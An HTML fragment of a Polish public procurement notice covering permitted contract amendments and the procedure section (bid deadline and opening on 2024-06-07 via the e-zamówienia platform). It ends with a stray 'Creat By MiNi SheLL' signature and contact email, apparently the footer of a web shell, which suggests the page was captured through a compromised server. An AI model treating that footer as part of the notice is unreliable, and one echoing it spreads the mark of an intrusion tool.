<span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Zamawiający dopuszcza możliwość dokonania zmian w umowie w następujących przypadkach:<br/>1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację przedmiotu zamówienia, w tym ustawowe zmiany stawki podatku od towaru i usług (VAT),<br/>2) zmiany terminu, częstotliwości dostaw i sposobu wykonywania umowy w przypadku, gdy niezbędna jest zamiana sposobu wykonywania lub terminu, częstotliwości realizacji przedmiotu umowy, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania umowy,<br/>3) w zakresie rzeczowym przedmiotu umowy tj. zaprzestania wytwarzania produktu objętego umową, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości, za cenę nie wyższą niż cena produktu objętego umową,<br/>4) przedłożenia przez Dostawcę oferty korzystniejszej dla Zamawiającego, pod warunkiem, iż odpowiednik jest tej samej lub wyższej jakości za cenę nie wyższą niż cena produktu objętego umową,<br/>5) wprowadzenia do sprzedaży przez producenta zmodyfikowanego/udoskonalonego produktu powodującego wycofanie dotychczasowego, za cenę nie wyższą niż cena produktu objętego umową,<br/>6) zmiany numeru katalogowego, nazwy produktu, wielkości opakowania przy zachowaniu jego parametrów – w przypadku wprowadzenia niniejszych zmian przez producenta potwierdzonych odpowiednimi dokumentami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com